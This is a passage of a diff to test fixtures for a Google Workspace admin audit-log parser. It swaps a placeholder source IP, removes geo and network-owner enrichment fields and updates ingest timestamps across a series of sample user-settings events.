"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_SECURITY_KEY\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "REVOKE_SECURITY_KEY", "id": "1", @@ -4498,7 +3580,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -4522,35 +3604,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301320200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USER_INVITE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005104600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USER_INVITE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "USER_INVITE", "id": "1", @@ -4581,7 +3645,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -4605,35 +3669,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301321900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"VIEW_TEMP_PASSWORD\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005107800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"VIEW_TEMP_PASSWORD\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "VIEW_TEMP_PASSWORD", "id": "1", @@ -4665,7 +3711,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -4689,35 +3735,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301323600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"TURN_OFF_2_STEP_VERIFICATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005112Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"TURN_OFF_2_STEP_VERIFICATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "TURN_OFF_2_STEP_VERIFICATION", "id": "1", @@ -4754,7 +3782,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -4778,35 +3806,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301325300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNBLOCK_USER_SESSION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005117600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNBLOCK_USER_SESSION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UNBLOCK_USER_SESSION", "id": "1", @@ -4843,7 +3853,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -4867,35 +3877,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301326900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNENROLL_USER_FROM_TITANIUM\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005123Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNENROLL_USER_FROM_TITANIUM\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UNENROLL_USER_FROM_TITANIUM", "id": "1", @@ -4932,7 +3924,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -4956,35 +3948,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301328700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ARCHIVE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005129100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ARCHIVE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "ARCHIVE_USER", "id": "1", @@ -5020,7 +3994,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -5044,35 +4018,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301330400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UPDATE_BIRTHDATE\",\"parameters\":[{\"name\":\"BIRTHDATE\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005134200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UPDATE_BIRTHDATE\",\"parameters\":[{\"name\":\"BIRTHDATE\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UPDATE_BIRTHDATE", "id": "1", @@ -5104,7 +4060,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -5128,35 +4084,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301332200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CREATE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005139500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CREATE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "CREATE_USER", "id": "1", @@ -5193,7 +4131,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -5217,35 +4155,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301333900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005143400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "DELETE_USER", "id": "1", @@ -5282,7 +4202,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -5306,35 +4226,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301335800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DOWNGRADE_USER_FROM_GPLUS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005146800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DOWNGRADE_USER_FROM_GPLUS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "DOWNGRADE_USER_FROM_GPLUS", "id": "1", @@ -5371,7 +4273,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -5395,35 +4297,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301337600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USER_ENROLLED_IN_TWO_STEP_VERIFICATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005150900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USER_ENROLLED_IN_TWO_STEP_VERIFICATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "USER_ENROLLED_IN_TWO_STEP_VERIFICATION", "id": "1", @@ -5459,7 +4343,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -5478,35 +4362,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301339200Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DOWNLOAD_USERLIST_CSV\"}}",
+ "ingested": "2021-12-09T13:38:57.005155900Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DOWNLOAD_USERLIST_CSV\"}}",
 "provider": "admin",
 "action": "DOWNLOAD_USERLIST_CSV",
 "id": "1",
@@ -5536,7 +4402,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -5558,35 +4424,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301340900Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"MOVE_USER_TO_ORG_UNIT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:57.005160600Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"MOVE_USER_TO_ORG_UNIT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "MOVE_USER_TO_ORG_UNIT",
 "id": "1",
@@ -5617,7 +4465,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -5639,35 +4487,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301342500Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USER_PUT_IN_TWO_STEP_VERIFICATION_GRACE_PERIOD\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:57.005166Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USER_PUT_IN_TWO_STEP_VERIFICATION_GRACE_PERIOD\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "USER_PUT_IN_TWO_STEP_VERIFICATION_GRACE_PERIOD",
 "id": "1",
@@ -5698,7 +4528,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -5720,35 +4550,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301344200Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"RENAME_USER\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:57.005171400Z",
